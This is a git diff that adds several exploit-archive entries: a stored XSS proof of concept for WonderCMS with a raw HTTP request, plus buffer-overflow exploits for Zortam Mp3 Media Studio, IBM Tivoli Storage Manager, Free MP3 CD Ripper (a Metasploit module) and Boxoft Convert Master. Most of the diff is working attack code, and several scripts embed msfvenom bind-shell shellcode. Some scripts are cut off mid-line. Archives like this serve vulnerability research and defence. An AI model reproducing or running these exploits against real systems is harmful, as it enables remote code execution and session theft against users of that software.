diff --git a/exploits/php/webapps/49085.txt b/exploits/php/webapps/49085.txt
new file mode 100644
index 000000000..c500e6d38
--- /dev/null
+++ b/exploits/php/webapps/49085.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Page description.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Page description: "hemantsolo">
"
+3. Now go to the website and the XSS will be triggered.
+
+POST /demo/ HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 196
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+DNT: 1
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: */*
+Origin: 127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: 127.0.0.1/demo/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925
+
+fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
\ No newline at end of file
diff --git a/exploits/windows/local/49084.pl b/exploits/windows/local/49084.pl
new file mode 100755
index 000000000..ac6c76dbc
--- /dev/null
+++ b/exploits/windows/local/49084.pl
@@ -0,0 +1,75 @@
+# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
+# Date: November 19, 2020
+# Exploit Author: Vincent Wolterman
+# Vendor Homepage: https://www.zortam.com/index.html
+# Software Link: https://www.zortam.com/download.html
+# Version: 27.60
+# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
+
+# Steps to reproduce crash:
+# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
+# 2) Open Zortam_Crash.txt output file
+# 3) Copy contents of text file to clipboard
+# 4) Open Zortam Mp3 Studio
+# 5) From the Menu bar -> File -> New Library
+# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
+# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
+# 8) Click 'OK'
+# 9) Connect to victim machine on port 80
+
+#!/usr/bin/perl
+
+$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
+$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
+
+$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
+
+# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
+# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
+
+$seh = "\x62\x59\x01\x10"; # seh overwrite
+$nop = "\x90" x 12; # NOP sled
+
+# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
+# Payload size: 355 bytes
+
+$payload =
+"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
+"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
+"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
+"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
+"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
+"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
+"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
+"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
+"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
+"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
+"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
+"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
+"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
+"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
+"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
+"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
+"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
+"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
+"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
+"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
+"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
+"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
+"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
+"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
+"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
+"\x9b\xec\xb0\xa9\x89";
+
+
+$file = "Zortam_Crash.txt";
+open (FILE, '>Zortam_Crash.txt');
+print FILE $baddata;
+print FILE $nseh;
+print FILE $seh;
+print FILE $nop;
+print FILE $payload;
+close (FILE);
+
+print "Exploit file created [" . $file . "]\n";
+print "Buffer size: " . length($baddata) . "\n";
\ No newline at end of file
diff --git a/exploits/windows/local/49086.py b/exploits/windows/local/49086.py
new file mode 100755
index 000000000..4a302f767
--- /dev/null
+++ b/exploits/windows/local/49086.py
@@ -0,0 +1,141 @@
+# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
+# Exploit Author: Paolo Stagno aka VoidSec
+# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
+# Version: 5.2.0.1
+# Tested on: Windows 10 Pro v.10.0.19041 Build 19041
+
+"""
+Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"
+
+PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
+PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
+FileName : dsmadmc.exe
+ARCH : I386
+DotNET : False
+ASLR : True
+DEP : True
+Authenticode : False
+StrongNaming : N/A
+SafeSEH : False
+ControlFlowGuard : False
+HighentropyVA : False
+"""
+
+# [ buffer ]
+# [ 68 byte | EIP | rest of the buffer ]
+# ^_ESP
+"""
+EIP contains normal pattern : 0x33634132 (offset 68)
+ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)
+
+JMP ESP Pointers:
+0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+"""
+
+#!/usr/bin/python
+import struct
+
+# 4000 bytes
+buff_max_length=800
+eip_offset=68
+"""
+BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
+
+GOOD CHARS:
+ asciiprint \x20-\x7e
+
+MOD CHARS:
+ \x00 -> \x20
+ ,-----------------------------------------------.
+ | Comparison results: |
+ |-----------------------------------------------|
+ | 80 81 82 83 84 85 86 87| File
+ | 3f 3f 2c 9f 2c 2e 2b d8| Memory
+ 80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
+ |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
+ 90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
+ |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
+ a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
+ |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
+ b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
+ |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
+ c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
+ |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
+ d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
+ |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
+ e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
+ |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
+ f0 |f8 f9 fa fb fc fd fe ff | File
+ |6f 97 a3 96 81 79 5f 98 | Memory
+ `-----------------------------------------------'
+"""
+# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
+shellcode = b""
+shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
+shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
+shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
+shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
+shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
+shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
+shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
+shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
+shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
+shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
+shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
+shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
+shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
+shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
+shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
+shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
+shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
+shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
+shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
+shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
+shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
+shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
+shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
+shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
+shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
+shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
+shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
+shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
+shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
+shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
+shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
+shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
+shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
+shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
+shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
+shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
+shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
+shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
+shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
+shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
+shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
+shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
+shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
+shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
+shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
+shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
+shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
+shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
+shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
+shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"
+
+buff = ""
+buff += "A" * eip_offset
+buff += struct.pack(" "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
+ 'Description' => %q{
+ This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
+ By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
+ application, a buffer is overwritten, which allows for running shellcode.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Gionathan Reale', # Exploit-DB POC
+ 'ZwX' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-9767' ],
+ [ 'EDB', '45412' ],
+ [ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
+ ],
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [
+ 'Windows 7 x86 - Windows 7 x64',
+ {
+ 'Ret' => 0x66e42121 # POP POP RET
+ }
+ ]
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x2f"
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => "Sep 09 2018",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
+ ])
+ end
+
+ def exploit
+ file_payload = payload.encoded
+
+ msfsploit = make_fast_nops(4116)
+ msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
+ msfsploit << [target.ret].pack("V*") # SEH
+ msfsploit << file_payload
+ msfsploit << make_fast_nops(4440)
+
+ file_create(msfsploit)
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/49088.py b/exploits/windows/local/49088.py
new file mode 100755
index 000000000..2d61eb3d8
--- /dev/null
+++ b/exploits/windows/local/49088.py
@@ -0,0 +1,66 @@
+# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
+# Date: 17.09.2020
+# Vendor Homepage: http://www.boxoft.com/
+# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe
+# Exploit Author: Achilles
+# Tested Version: 1.3.0
+# Tested on: Windows 7 x64
+
+# 1.- Run python code :Boxoft_Convert_Master.py
+# 2.- Open Boxoft_Convert_Master.exe
+# 3.- Click try and Batch Convert Mode
+# 4.- Add Evil.wav
+# 5.- And you will have a bind shell port 4444
+# 6.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+
+import struct
+
+buffer = "\x41" * 4132
+nseh = "\xeb\x06\x90\x90" #jmp short 6
+seh = struct.pack('